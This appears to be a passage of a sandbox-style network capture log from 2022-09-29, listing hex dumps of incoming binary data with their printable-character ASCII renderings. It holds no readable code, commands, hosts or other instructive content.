                                                                                                                                                2022-09-29 12:51:35 UTC12385INData Raw: 4e c8 e8 07 00 0d ed 46 59 56 94 4b 74 e5 3a 55 11 f8 f2 77 00 f3 eb ec 09 d4 59 e3 2c 6d 1f 73 21 d5 75 f1 25 93 03 e5 83 26 e4 36 05 7d dc 36 d1 b0 19 19 53 d9 07 e8 c8 3b d6 8c ae 38 4e b5 9d 47 43 79 df c8 ec ab 6b 20 72 ec 4a b3 e4 54 2f 44 4e ec b5 e7 40 0b bb 31 e7 3f de 30 67 ce 64 3d 93 46 0a 7d ba ca 56 f5 ea cd ce 1f 4f 2f 8c f2 ee a8 b1 be 87 ad 8f a8 cf 4a d2 99 8c ca 6e eb ef 5e 72 71 63 2b 2e 43 e0 eb be e2 7a ab 7d a1 2b 62 3c a8 d1 1c 07 c6 70 08 30 60 77 2d f7 42 19 49 71 1e 15 d7 10 6d f0 69 ec 6e 1d c1 1d 92 7c fe 78 dc 1c f6 70 e4 92 f4 d6 8a 24 7d 12 0b 6a 13 f5 e4 ca 3b 64 82 b8 a5 2b 52 9a db 2f 4d 7b cc 34 9d f6 dd 4f 19 56 2e b5 6b b8 d8 8c 35 93 a9 44 70 8b 09 e5 6f b8 b1 5f 96 6d 3f 9d cc cb 14 8f 12 fd ae 01 df c0 4f a2 40 db
                                                                                                                                                Data Ascii: NFYVKt:UwY,ms!u%&6}6S;8NGCyk rJT/DN@1?0gd=F}VO/Jn^rqc+.Cz}+b<p0`w-BIqmin|xp$}j;d+R/M{4OV.k5Dpo_m?O@
                                                                                                                                                2022-09-29 12:51:35 UTC12401INData Raw: 84 67 35 44 f6 5a a8 c7 96 ae 51 14 ea 29 67 e0 aa 54 25 d6 0c 6d ef bc 70 81 5a 85 56 81 52 54 d6 7f 3d 65 73 a7 78 df 1c 3c 1a ff 69 b8 cf d7 51 53 af 42 24 fd e4 cc 8a 0e d2 f1 ca 6e df 03 7c 24 1b c4 3a d7 08 e4 c3 22 3d d6 fd 97 bb f0 c5 23 02 7b 24 bc 0d 73 3f 62 57 29 f0 6e 1d 5f 11 3f 6f 99 aa 4b 07 70 d9 50 51 fd e6 02 51 a0 ae db 76 dc 6d 3c 4c 74 a5 86 8d 4b 03 39 9f 39 cd 78 85 55 85 e5 2a c9 9f ea eb 40 58 3b 2b fc 76 78 ad 5c 99 22 74 35 b3 6c 04 69 fa 3e 62 7c 96 9f 5a 15 a7 4e a9 82 f3 8d de 66 14 bf 71 b8 a3 28 4b 12 20 60 a3 3b 9b 40 5c 7a a4 1f 8c 37 db 77 d2 af fb 8a 59 8b 69 bb ca fa 15 cd 60 06 e1 d8 59 85 d5 6d 90 3e aa fd fb 09 50 f4 21 a2 4d d3 61 ca 40 15 05 13 d7 e4 99 7e ee 86 4c 77 69 d1 4b 40 ee 0c 6e 87 3b 9e 1a 92 35 0d 65
                                                                                                                                                Data Ascii: g5DZQ)gT%mpZVRT=esx<iQSB$n|$:"=#{$s?bW)n_?oKpPQQvm<LtK99xU*@X;+vx\"t5li>b|ZNfq(K `;@\z7wYi`Ym>P!Ma@~LwiK@n;5e
                                                                                                                                                2022-09-29 12:51:35 UTC12417INData Raw: 92 57 de 7f b9 b9 25 15 a8 8c 3a 5d ea 22 cd 58 c8 82 76 6a 04 c7 3e b3 72 5c 34 dc f0 ff 29 6b 56 7d 57 e0 36 41 dd bb 5d d1 bf f9 1a f2 d0 c6 a2 1b e8 a1 a8 19 a8 05 a0 a7 98 b8 fa eb 7e 3b 4c 4e e8 3d 8d c4 0e ae c5 90 a5 26 77 ac 47 11 14 91 4e 4e 30 e1 72 7c 59 4c 5e fc 2b 52 2b cb b3 49 77 c8 ff 39 cb e6 56 09 29 cb e8 55 a8 0c 57 50 eb 3a 40 70 e4 3b 7f 20 4b b2 9f 46 08 12 b0 8f a2 2f 1d 03 04 b4 bc bc e8 9c 8d 2f 24 df cd e4 94 ad e7 c9 23 96 42 3e 57 f9 3f f1 e5 71 71 80 f1 47 6f e9 02 bb 57 e0 d5 77 e9 75 e2 71 eb 10 c6 8a b7 5e f2 34 fa 96 08 24 65 97 74 5b a9 80 8e ad 0b 38 09 13 45 c6 e9 66 23 78 46 6e 54 f7 02 75 04 cb 58 7c 29 1b e1 ef 6c 73 b8 7b 7d 92 f5 43 61 84 f4 86 0e 47 e1 5c e7 ae b1 86 02 c3 2d a3 8c a1 3b 95 69 47 14 b7 47 91 28
                                                                                                                                                Data Ascii: W%:]"Xvj>r\4)kV}W6A]~;LN=&wGNN0r|YL^+R+Iw9V)UWP:@p; KF//$#B>W?qqGoWwuq^4$et[8Ef#xFnTuX|)ls{}CaG\-;iGG(
                                                                                                                                                2022-09-29 12:51:35 UTC12433INData Raw: 29 c0 b9 82 8e 8d 74 36 99 5b 16 74 c0 96 17 8b dc 9d ac 49 8e 27 2e 75 b1 5c 33 43 2d 7e d3 55 ee b6 c4 7a 6e 09 a6 1f 4c 6b 80 69 e5 4f cb 9e 34 cb 97 ee cc b5 ce 02 5a c6 9c 54 bb 34 a6 9e f2 9c 97 bb d2 c9 61 18 86 ed ac d4 fe 14 e3 81 7e ae 0f 10 67 ea 04 7a ab 02 05 5d 65 20 1b e3 3b d5 44 d5 ff e7 82 38 16 e4 38 a3 b8 48 ba bf d7 99 81 ee 3a b8 55 ad 39 21 e4 64 5d 81 59 68 ac 51 4d e4 16 b5 0b 0b 7f 3c 2d 89 a8 62 61 48 f5 5b 43 2b 8c c1 ed 92 2d ab 17 0a a8 5f 2b b6 b1 db 22 7b 25 c4 1d bf 7c 5d 1b de 73 2e 71 67 dc 35 17 9f 2e f9 b7 a0 19 2f 87 36 ee 1e dd 7d f3 cc f5 a2 2e b9 c6 46 59 1d ab fe 3e a6 0d cd 81 4f 2a 04 cc 99 c0 c9 36 49 03 8d 77 b4 eb 2a b9 b7 b8 72 34 8e 3b 85 a4 8d 57 56 66 4f 7b 93 00 e6 ba 0a 41 65 0d d7 1c bb cb 98 7b c5 c1
                                                                                                                                                Data Ascii: )t6[tI'.u\3C-~UznLkiO4ZT4a~gz]e ;D88H:U9!d]YhQM<-baH[C+-_+"{%|]s.qg5./6}.FY>O*6Iw*r4;WVfO{Ae{
                                                                                                                                                2022-09-29 12:51:35 UTC12449INData Raw: 74 68 30 31 f0 b9 ff b4 84 10 c0 30 3a 31 01 85 d0 f6 f5 d7 be ff 55 22 0c 1f 0b 39 dc 60 b8 a3 c6 01 78 c6 76 12 cc 4b 8e b6 69 ec 74 02 34 b5 93 f6 d1 63 ed 60 8f da 91 4d 9c 96 ab 4b 7e 49 b6 66 51 d2 b1 ee a4 6e 60 a0 79 a5 4d c2 4f 58 b1 fc 64 eb 82 85 98 14 34 45 8e de e1 cf 93 f6 e6 4d 4e 98 bd ff a2 74 24 ef 20 62 27 2b cc e7 db 72 df 82 db 84 18 fb f2 5b 79 41 70 f3 26 31 98 88 71 98 30 7e 5d 78 ba e2 28 28 56 84 5a 30 a0 ad ec ee 26 e9 37 62 2d d9 db 38 56 cc c9 69 0f c7 0a d7 6a c9 25 31 59 0e 50 a2 98 cf e2 29 24 36 5e 96 a6 67 e5 92 1e d8 58 8e 15 52 ed be 14 79 ef b6 3b 03 6d c9 79 06 74 21 34 7d 9c 8f 05 b3 b3 54 0b 8d ce 6b 7f 00 ad c5 02 3d c4 98 4b a5 1a bb 40 3a 2e cb 14 dd ec 12 89 ab b4 48 6f ca 27 91 d2 70 0e d6 36 ae 34 30 0c c6 0d
                                                                                                                                                Data Ascii: th010:1U"9`xvKit4c`MK~IfQn`yMOXd4EMNt$ b'+r[yAp&1q0~]x((VZ0&7b-8Vij%1YP)$6^gXRy;myt!4}Tk=K@:.Ho'p640
                                                                                                                                                2022-09-29 12:51:35 UTC12465INData Raw: be aa 8a 04 ef 84 00 03 42 3a 87 f9 7a 83 17 70 f1 c7 05 20 59 68 f1 c1 37 68 14 bd 9d f0 6a 0c 2c 7d 47 4d f6 05 48 dd 2d 8b d1 15 6a 05 50 f9 e1 cb ab cf 28 ed b8 5f 3d a7 b3 98 9a b8 53 91 b0 cc 42 7e 4c 2d 0a 74 82 1c 63 99 00 05 59 99 9f 16 9f e1 67 9f ad b7 ae 95 da 0e 6b 9c 5e d9 b6 32 9f 12 c2 8d 01 95 a3 af 28 1d be 1a 89 03 b5 d2 3c 97 e4 85 32 c3 95 d7 f2 eb 2d a0 2f f1 d4 f1 37 d4 38 12 7b 88 85 ca 94 93 6e fb f1 18 0c 74 ef 9a c1 07 57 92 27 a6 b5 0b ea 75 e3 2b 7f fb 9d 82 c9 9a a5 7a 1d e2 b3 ff 71 86 50 41 b6 c0 11 6c 12 d9 a7 87 a0 6d 35 1e ad 31 bd 38 f8 52 88 78 f1 78 28 6f 30 3f 1c 80 66 f5 a9 26 31 f1 b5 f1 75 3e 79 8e 81 00 42 f1 7d 76 d2 66 9a 17 f3 64 08 64 8b b4 c8 53 5a 50 5f fa 80 88 32 ad 2f 97 79 0a c6 0c 0c 1a 53 15 da f1 89
                                                                                                                                                Data Ascii: B:zp Yh7hj,}GMH-jP(_=SB~L-tcYgk^2(<2-/78{ntW'u+zqPAlm518Rxx(o0?f&1u>yB}vfddSZP_2/yS
                                                                                                                                                2022-09-29 12:51:35 UTC12481INData Raw: 16 1e 02 af d7 c2 4b a7 e4 ae 36 5d 14 46 04 22 14 ef ad e0 24 f7 e2 57 7b fa e6 09 9f 36 10 87 34 ff fd 55 e3 1e c2 0d 94 c2 0e 63 ba 98 71 8c 40 2e f4 60 69 48 df 0a be 82 2e 7d b9 e2 31 83 e3 b8 3b 79 55 6e 22 25 44 38 33 21 e4 d1 a4 45 02 cc 1b 90 08 da 02 e7 2e 50 23 96 80 51 cb dd 48 d8 b7 7a 62 61 f3 2f 45 f6 79 99 9b 05 d8 2f ab 3a 95 b8 86 39 b5 e3 96 57 97 ae 98 02 e6 9c 19 f3 0d 36 45 f4 a8 c9 21 51 ab 3b 75 08 a2 76 21 90 33 6d c5 9a c7 fa 47 e0 12 c7 97 3b 87 5c f7 a2 65 03 ee d3 4b e6 20 62 09 6c b3 bd 9a 81 39 82 1a 7c 41 77 1f c4 04 1f 21 96 1d 56 26 69 47 e1 7b 17 a8 86 8d 78 16 e7 32 c5 a9 6a df 9d 86 ea 49 14 a0 68 3b 10 f5 d1 ff ff cb 79 33 2d 2d a4 a3 ee 72 f4 a6 0b cc f9 b5 ec 5a 58 22 84 df 72 65 51 da 53 c0 51 f5 7a 15 a9 f6 e0 72
                                                                                                                                                Data Ascii: K6]F"$W{64Ucq@.`iH.}1;yUn"%D83!E.P#QHzba/Ey/:9W6E!Q;uv!3mG;\eK bl9|Aw!V&iG{x2jIh;y3--rZX"reQSQzr
                                                                                                                                                2022-09-29 12:51:35 UTC12497INData Raw: c1 4c 58 7b 7d 2b 1a 2f 7c 44 e9 c9 d1 84 34 ec d1 19 ea dd 90 bd 1b a3 a0 ac b8 c8 99 97 5c f4 9b 76 f4 f4 bd 28 d2 6c 8d 80 49 60 50 9f 6d 4e cf bc 90 12 88 81 eb 61 e0 5c 07 46 c7 7a e7 d6 4d e9 10 e7 5f 21 45 be b6 1f a5 83 18 2a 17 ca f8 f2 3a b1 ae 25 6b ce bc ab 16 90 3f e0 5b 4d d8 e1 7a 29 67 aa 0d 60 03 62 16 2a f0 b3 2a f1 41 d4 68 f7 ba 94 9d 24 74 06 f8 16 5e 00 4d b5 e5 62 4f 31 35 dc 52 8b fe c6 8b 7a 80 e1 61 ec 8c d9 a1 5b d8 0f 35 82 c9 87 09 9a 62 a0 ff 97 e0 83 7e eb 92 0a cb 27 0c 0c c4 28 7a ab 95 36 0f 3e e4 55 0f ad 4b 42 89 67 12 72 06 3e ec 20 d8 3f f6 4c ab 2e c2 f1 2b 08 f2 e3 ca 82 ae 8f b6 90 ce 99 09 8c 8a 94 33 2e 50 07 e8 ef 50 be 85 4a ba 33 87 32 a5 ff a5 b1 d5 73 aa bd e2 7b bd 63 28 e1 83 8d 77 93 e8 51 f4 30 89 99 f6
                                                                                                                                                Data Ascii: LX{}+/|D4\v(lI`PmNa\FzM_!E*:%k?[Mz)g`b**Ah$t^MbO15Rza[5b~'(z6>UKBgr> ?L.+3.PPJ32s{c(wQ0
                                                                                                                                                2022-09-29 12:51:35 UTC12513INData Raw: 88 41 9a af 96 76 b4 4c 6b c9 e4 c1 13 d8 10 09 4e 80 ea 0e 4d 02 86 ed e8 44 d6 be 2a 56 19 e2 cb b0 2c f2 29 51 3e 17 b7 13 35 e9 7e 40 7e 35 89 5b 70 fd bd 37 26 1b 95 d4 5f 02 15 bc 5b b1 46 46 3e 9f 49 7e a8 d5 0a 6a f1 7b 27 30 78 24 e0 94 4d 2d 0d 75 25 2b b6 e3 9a 1e f4 01 81 5c 49 e5 db 8d df 7f 9c 5c 3d 4b ae 89 fe a5 de 67 63 62 31 4a 9f ff 41 bb ae a1 96 a2 6c 2c 25 2f 6f b4 24 08 5d fd a4 71 e3 3d 4b 13 5f bc 97 1e 96 4c 81 6a 42 88 80 7b 4b 8c 50 a0 a8 14 9c 68 e9 48 08 59 76 56 6f 5d 7c f8 24 6b a2 18 10 aa d5 4f bf 84 ed f9 88 f8 0b 9d f3 a1 ba 55 38 f3 9a 40 02 f6 0b fc 20 74 39 4f e6 3d d0 28 13 82 53 ae ae f5 d9 7a e8 5c ca d5 c7 06 f0 e7 5f a7 2c 9f 99 a5 5b 5b 0e 69 ea c1 aa e8 68 cc cd 0d 5a 3b b6 fb 1f 13 08 39 a5 ca a2 cc 94 a2 25
                                                                                                                                                Data Ascii: AvLkNMD*V,)Q>5~@~5[p7&_[FF>I~j{'0x$M-u%+\I\=Kgcb1JAl,%/o$]q=K_LjB{KPhHYvVo]|$kOU8@ t9O=(Sz\_,[[ihZ;9%
                                                                                                                                                2022-09-29 12:51:35 UTC12529INData Raw: 3b f7 1a 52 c0 fe 2d 5c ee 5e 99 ab 38 65 41 4f 10 b3 da 95 68 1d a9 69 f3 e6 b8 b7 1e e0 0b b3 86 db 19 9b 7d 59 ad ce bc d6 0b fe 1d 45 b5 bd 29 ca cf 50 ff 87 34 00 34 0e 33 a9 20 e4 c2 e5 fe c8 18 88 a9 44 70 13 af 5e 69 04 3d be d9 1e b4 97 bf 7b 12 b6 86 17 21 d3 60 2e 97 40 f9 e3 df 70 6d 6c 33 b5 5b 23 6e 08 8e a3 8e 64 e2 94 1f a4 d2 a0 28 ba 64 ec 68 bd 0a 5a d1 c9 14 4f 0c 95 ef bb 49 9c fa 6a 90 a0 c7 f5 fb 15 cf 38 42 31 23 9e f5 d7 8c 6b 5a fb e4 91 2f b3 3e a6 a7 5d 16 ed 15 c8 bb 22 ab c1 35 e7 0c 75 f6 62 39 e8 db ec 8f 9c 1d 44 07 0a 32 f4 79 b6 8b 01 b3 6a 8b 20 fa a0 fb b9 4b 93 4c 24 61 38 6c 69 c3 5c 24 4a 97 03 3f 17 1f 60 ab a1 f9 a6 a5 36 2b 0a 04 0e e7 04 bb 67 0f c6 4f d0 b7 96 a9 27 7a d8 11 77 41 c8 2b 89 61 4c 10 90 16 4f c5
                                                                                                                                                Data Ascii: ;R-\^8eAOhi}YE)P443 Dp^i={!`.@pml3[#nd(dhZOIj8B1#kZ/>]"5ub9D2yj KL$a8li\$J?`6+gO'zwA+aLO
                                                                                                                                                2022-09-29 12:51:35 UTC12545INData Raw: f4 95 ea 31 a0 9e f9 e5 9f d0 2a ba 8c 3f 78 e7 6b c2 53 eb 7d d6 81 7c d8 49 d0 8b 2e 43 70 ca 4a 51 66 fb 64 c1 6d 8d 14 2c d5 6e 24 82 21 dd a9 95 ed 71 aa 8f d1 bb b9 fa a6 5b ba 9a b9 89 b1 a0 6c dd 75 e7 64 49 e7 ca 22 79 84 1d df ea 83 77 85 67 73 cc 9e 1e f8 9c 0d 06 75 d3 99 c7 d9 87 f8 3a d9 b3 63 a9 3f da 96 91 1e 8f f1 c3 6f 76 6c 69 cd 13 90 a8 88 06 a1 ae 43 07 1a 41 87 30 d3 9e 58 d5 d2 02 3f 00 8f 0a 09 72 62 03 9d 79 fa fd 88 d6 2b 60 d4 ef ba 92 cd 47 63 86 df 3d 66 98 45 47 96 e5 05 df 33 13 47 11 35 35 5f cb 45 2d 1a fe 88 30 bc 69 77 5b 04 32 af 10 46 1e 97 9c 7d e4 ff 8a bd 5d 5b 92 6f a9 dc 7e b9 06 33 56 98 b9 c2 fc 8a 7e 61 60 05 61 dd 1e a2 32 68 b2 1f 97 36 61 18 a2 64 f1 f8 8e e1 aa 3d df bb 59 f0 86 08 13 2f 81 ce d5 79 9b 7e
                                                                                                                                                Data Ascii: 1*?xkS}|I.CpJQfdm,n$!q[ludI"ywgsu:c?ovliCA0X?rby+`Gc=fEG3G55_E-0iw[2F}][o~3V~a`a2h6ad=Y/y~
                                                                                                                                                2022-09-29 12:51:35 UTC12561INData Raw: 5d 1c 92 b0 22 c3 39 b4 e4 dd e6 41 45 e8 13 9d f8 0d 6c cf b3 01 0d 00 24 d8 31 95 9c 21 fe ae 24 d6 3e 57 33 64 b1 e8 d8 f7 f5 eb d6 9b b3 2e b6 3e 42 cf a5 9c 59 c6 04 0e 95 74 6c cc f6 44 5a 14 ef 96 81 9c dc 17 a3 7c 17 c1 54 69 12 59 f1 e3 79 5b a0 43 01 fc 96 7b cd d4 42 60 c6 27 0d 2f 98 35 56 9b e0 71 e2 60 be f4 1d 89 d4 25 9a 2b 57 8f e3 f9 c6 6a dd 63 2f 6a 1f 9c 16 64 d6 d5 e4 52 8f 2e 4f dd 46 d4 56 b4 e2 8a 96 76 6c 37 1b 6a 99 2b 98 69 e5 88 7a 55 67 8d d7 27 2e e3 3d a6 f6 99 6e 21 99 9d 9f b4 d9 23 de a8 be 0a 50 f7 09 f8 07 24 16 c3 47 ea 9c 4a 17 b1 de 3d a1 44 0b 4d 92 ca 78 17 e5 37 0c f1 a1 99 44 a8 00 09 3a 3e e8 d1 2e ac 1b 74 9d a1 5c cc a0 d4 c5 18 58 19 33 07 20 c5 29 66 a9 6e af 0f 7a 54 bf 32 68 3b e7 06 76 e9 f3 a8 40 ed 66
                                                                                                                                                Data Ascii: ]"9AEl$1!$>W3d.>BYtlDZ|TiYy[C{B`'/5Vq`%+Wjc/jdR.OFVvl7j+izUg'.=n!#P$GJ=DMx7D:>.t\X3 )fnzT2h;v@f
                                                                                                                                                2022-09-29 12:51:35 UTC12577INData Raw: cf 92 ae e6 d8 a8 dd 50 7c 49 f8 40 4e 88 2f 9b 80 27 3d a9 42 cd 58 97 45 e0 df 1d 23 ca 86 7d 55 9d ac bf cd f2 98 1e 27 9c 30 d4 35 a2 23 fb 9e 2d 01 db 11 c2 08 9e fb 37 d6 c4 36 b2 e5 2e 32 58 19 d5 8e 90 52 34 9c 0b 1a ca 75 49 85 f0 e4 68 26 d3 d1 ee 6d fc 90 90 49 05 cb 03 3f 66 ef 0e 87 ab 32 87 7d 62 7b 35 4d cd 12 4d 2e 06 11 07 64 b3 3d 68 5d a0 5a 9e 4a 24 a9 ba 48 e4 43 ac 3b 24 23 c2 6b d5 e5 60 97 79 40 dc 39 59 1f 97 b3 17 a7 cd 27 e1 68 35 45 33 32 3c 30 b3 e7 b0 6a 4c 23 b5 20 38 a9 40 9f 53 39 fb 29 b3 da 50 6a fb db 78 1a db cd 77 c8 eb 59 05 68 eb 0d 5b 04 a6 da 9a 02 da de 5b 53 67 e3 97 1b de 96 c6 ff 67 33 f4 49 ca c7 36 00 04 49 36 04 f6 d9 ac 64 50 05 9a ff 1a 40 44 70 c4 b6 d9 66 6b c4 9d 1f d4 62 67 14 a4 db 76 17 89 06 83 2d
                                                                                                                                                Data Ascii: P|I@N/'=BXE#}U'05#-76.2XR4uIh&mI?f2}b{5MM.d=h]ZJ$HC;$#k`y@9Y'h5E32<0jL# 8@S9)PjxwYh[[Sgg3I6I6dP@Dpfkbgv-
                                                                                                                                                2022-09-29 12:51:35 UTC12593INData Raw: d8 42 41 34 ce 8e fd 63 26 37 aa 06 1a bf 1c d3 1d 0e 44 2d f8 08 74 30 02 3a 41 c8 88 23 0f f4 33 7d aa 53 6d 37 83 45 d1 d1 dc 3e 40 ec d7 68 8d e3 01 c3 af 6a ce 79 28 1e 7f dd f7 17 b2 d7 86 45 98 9b 74 29 6a 0f 92 e2 1a db db 28 bc ea c0 be 4e c4 46 6f 8b 39 3b aa b0 bd 74 af 7b b0 97 0b 7f 8d 12 6a eb a6 67 b2 9e 69 1b 03 24 79 50 3c b9 1b 93 15 3c 44 3e 9c be 1c 77 ac 19 00 bf 43 f9 e2 ea 0d 0a 41 a4 55 64 3a 2f 59 5c c4 e0 5f 03 a4 bb 35 d1 40 c3 6d 95 69 9c de c9 40 7e 0b 3c eb 00 86 f7 fa 5d 3d d9 57 fa e7 f2 ad 17 c3 59 c7 93 80 e3 7b 79 60 67 f4 b8 d6 53 c3 ee a6 4a 46 fd 9c 8a ed 5f 49 cd 28 f6 eb a5 4d 0c d1 02 fa fd 58 ca 4c 54 95 34 27 b2 3e 49 66 98 f7 fc 96 c0 76 24 40 44 ad 83 96 e0 60 3a 60 8c 6c b9 c8 55 57 be 0e 55 d3 1d d0 c1 66 00
                                                                                                                                                Data Ascii: BA4c&7D-t0:A#3}Sm7E>@hjy(Et)j(NFo9;t{jgi$yP<<D>wCAUd:/Y\_5@mi@~<]=WY{y`gSJF_I(MXLT4'>Ifv$@D`:`lUWUf
                                                                                                                                                2022-09-29 12:51:35 UTC12609INData Raw: a0 4c 6b b0 9b 62 e2 e0 40 45 c9 f0 56 4b e7 7c b5 34 f0 be c8 c5 64 fc c3 77 a3 40 3f 71 f2 8c 19 c0 dc 6b ed f7 e3 df cd b6 a4 ef c3 6d 89 a3 c1 88 9d 1a 9f 37 f6 15 8c 9c 59 32 f5 88 f3 11 b9 fd 99 c3 c6 8a 31 17 4d 61 46 c3 5c 58 8c 34 21 a7 47 f7 79 c7 5f 6a 89 3e 77 f7 b0 0a c0 04 8c dc d9 a9 eb 64 a4 c0 92 32 4d 8c c0 13 60 b9 83 c1 0d 3b 3e 45 b6 01 9f 68 07 03 4d b7 11 47 80 f6 f0 81 ce c1 b7 e5 de 43 16 47 a3 03 51 6b 3f 0f 89 d0 79 07 f4 43 9e 56 f0 66 05 d1 86 ae b5 cf 95 a5 a4 6a ab cd 79 fa d1 ac c5 5e 61 15 6b 62 82 c4 b0 35 fa 54 b3 e4 e9 0b 4f a7 3e af 96 9c 29 ed b1 fa 32 78 21 b0 ef 0e 0d b1 a7 44 b8 96 22 d5 f5 27 81 f6 24 33 62 26 b0 e4 28 f7 e5 bb fa 92 f2 17 c5 5d 81 61 36 1f c7 76 ea 3a e4 e4 dc cd df 36 c3 c7 e7 09 f2 6d 4d 21 3a
                                                                                                                                                Data Ascii: Lkb@EVK|4dw@?qkm7Y21MaF\X4!Gy_j>wd2M`;>EhMGCGQk?yCVfjy^akb5TO>)2x!D"'$3b&(]a6v:6mM!:
                                                                                                                                                2022-09-29 12:51:35 UTC12625INData Raw: 3c 4a 9f 0f 7b 5e 5f 75 e1 16 cd 0b 38 2b cd c4 8c e0 90 cb b0 22 54 8f c5 3c f0 fa d4 bc ef 4b f0 73 d0 28 97 fb be 18 d9 a4 9d 32 31 d5 82 48 58 87 e9 9b 39 da 82 b4 18 8f b3 3f a2 ba 55 d5 a8 20 90 99 3e 86 72 35 f4 c1 cc 74 b0 f6 dc e9 92 f8 9d f4 ea ad 40 46 6f 09 1a 6b 0e e0 e3 ce 64 c5 81 e5 96 b1 33 40 aa 34 7d 04 1f 02 e2 89 62 77 c6 36 fd c8 5e 22 3a 3d b5 b0 b0 3e 5b 5a 22 32 81 c7 81 40 fd ca f2 05 31 00 23 9d e3 f1 01 10 8e b5 59 b9 c4 60 ce 1a 40 99 10 a3 e1 c4 64 13 e9 20 53 83 31 23 61 b7 25 57 38 4e 81 ab 67 b2 71 0a d2 bd 10 f2 72 b1 6a a3 3e fe ba 14 88 18 86 95 f3 a2 e1 11 b8 92 ce 3e a3 39 21 df 1f 30 15 26 ee 5a fd 0e f2 ab d6 7d 68 42 60 69 27 d8 b1 82 d1 2a 11 de 44 31 cc 6d aa 85 74 49 bb dc 21 67 30 53 e9 0b 2a 65 ea 50 d3 34 14
                                                                                                                                                Data Ascii: <J{^_u8+"T<Ks(21HX9?U >r5t@Fokd3@4}bw6^":=>[Z"2@1#Y`@d S1#a%W8Ngqrj>>9!0&Z}hB`i'*D1mtI!g0S*eP4
                                                                                                                                                2022-09-29 12:51:35 UTC12641INData Raw: e3 4a fb 76 25 28 9a c5 15 ea 25 fc 9f 0d 17 d6 4b 2f 6c 90 cb 17 06 1b 01 08 a6 81 b6 3b 1b 9e ab 03 1b 18 6c 1f c3 f1 0f 23 49 7c 8d 92 88 cc 02 d0 c5 ef 0f 94 b0 fb 9c 94 fa d1 7f 61 55 22 3f 92 52 0a a4 c0 7e 9e 78 4b 31 e1 35 70 62 af 47 4b 48 ec 37 5c ef 17 0e ba 4f 62 e2 e8 a9 14 68 2c c7 66 d8 79 ff 66 40 75 99 51 87 d2 f0 a0 73 a2 13 23 ac bb aa c4 e0 0f 77 27 d6 a2 28 37 45 33 af 5d 2f e7 a5 ea a9 d0 e3 3a ef ee f0 11 61 11 53 38 bc c8 99 a4 49 d1 eb cd d9 00 8e aa 18 38 f1 a6 ee d8 29 8e d7 5f b5 27 53 17 f5 0f 77 8f 59 4d 40 7f 54 ac b6 50 f9 9a e9 1d 6f 9c 17 e3 ce 18 93 fd 31 05 20 74 3d ca af 51 7e 53 ec 2c 8a 90 f8 84 d9 24 cb 07 5a f0 e0 7c 9e 0c f8 f5 47 e4 54 75 d5 f3 1f d7 c7 e8 f9 a5 58 21 8f 24 82 71 aa f3 f2 7f fc b0 09 a3 3e 10 38
                                                                                                                                                Data Ascii: Jv%(%K/l;l#I|aU"?R~xK15pbGKH7\Obh,fyf@uQs#w'(7E3]/:aS8I8)_'SwYM@TPo1 t=Q~S,$Z|GTuX!$q>8
                                                                                                                                                2022-09-29 12:51:35 UTC12657INData Raw: 06 f1 be 45 8d d5 3f 1a 69 6b 17 2b 6d 82 81 90 52 d1 e8 51 c5 f2 39 e8 e7 c6 c1 b1 9a dc 57 2c 05 bf 14 87 89 5b 34 65 4f fc 41 72 24 9e dc 63 e6 cc 0c 7a 54 0f 52 c5 88 cc 72 52 c7 09 2c de e5 ef 09 13 a4 d1 97 a1 ee 28 b6 54 83 74 38 11 28 9c 6a de dc 6a 2b 93 d9 3a f9 cd 4d cb 78 54 f3 c6 88 91 99 54 11 b2 32 05 66 81 33 5e f9 18 7a 37 3b 50 0e 23 cc b3 97 83 6f e9 57 8e 10 b6 dc b8 db 16 4f 36 a4 f2 f2 c6 fc 5f cc 4a 85 27 93 48 87 1d 8a 0e 54 c4 a0 71 51 e2 04 3c e2 26 64 02 cc 51 8a 0a cb f1 eb 43 af da 6b 5c ad be 6e 4a 87 47 84 23 75 b9 50 a5 51 e0 0a 32 e1 cc 62 fb cc b7 40 9a 62 26 c8 43 ae 59 52 f0 fc 22 9f 29 1b 83 91 87 bb e3 07 78 a4 5c 24 3f 6b dc 25 10 e4 ab d7 7e 38 59 d0 77 4f 61 6a 64 1a 7d 09 76 61 97 6e a8 ff a9 c0 f9 1b 6a 75 47 7a
                                                                                                                                                Data Ascii: E?ik+mRQ9W,[4eOAr$czTRrR,(Tt8(jj+:MxTT2f3^z7;P#oWO6_J'HTqQ<&dQCk\nJG#uPQ2b@b&CYR")x\$?k%~8YwOajd}vanjuGz
                                                                                                                                                2022-09-29 12:51:35 UTC12673INData Raw: 4a 13 98 5b 87 9d 3c b9 dd c6 88 42 5d 72 56 ac e3 94 e4 a8 ec 73 91 2d 73 04 89 24 b2 9f 59 85 c1 99 b9 a9 ad 39 8f f2 f2 e6 47 58 67 73 81 26 29 97 56 33 a1 34 5d b8 25 7b c4 c4 57 44 3b 92 ea 4c aa 09 93 81 73 3f 80 cc f5 4c 1b d9 f2 c2 82 44 ca c1 cc b4 fb e5 e0 4b e4 ba 0a 17 70 7b fe c1 fc 63 40 26 92 a3 4c 75 b2 81 95 0c 60 c2 0a c0 ab 7f 46 e0 34 58 30 38 32 20 ef 2a 15 23 35 36 0e d6 d3 f7 c1 31 66 58 6b 43 75 c1 a3 5c 1a a5 9d a1 76 47 dd cc 5e b1 a8 29 33 4e 6e 0f dc ad f5 f9 ac 7b d2 d2 9b 84 43 87 69 cd 5c 20 5d 8a 61 c2 ca 39 25 9d 26 28 36 8f 5e de db 61 a6 2b e1 15 8e 1b 5e fb 35 c9 32 27 2d fd 59 68 41 73 17 52 f4 59 0a 74 23 8e f5 f1 05 e0 5a 16 47 18 62 2c 87 10 bb a3 f8 87 04 ed 7d 66 36 d5 11 65 e4 c3 8a 68 e8 f2 92 45 f8 5b 42 89 9c
                                                                                                                                                Data Ascii: J[<B]rVs-s$Y9GXgs&)V34]%{WD;Ls?LDKp{c@&Lu`F4X082 *#561fXkCu\vG^)3Nn{Ci\ ]a9%&(6^a+^52'-YhAsRYt#ZGb,}f6ehE[B
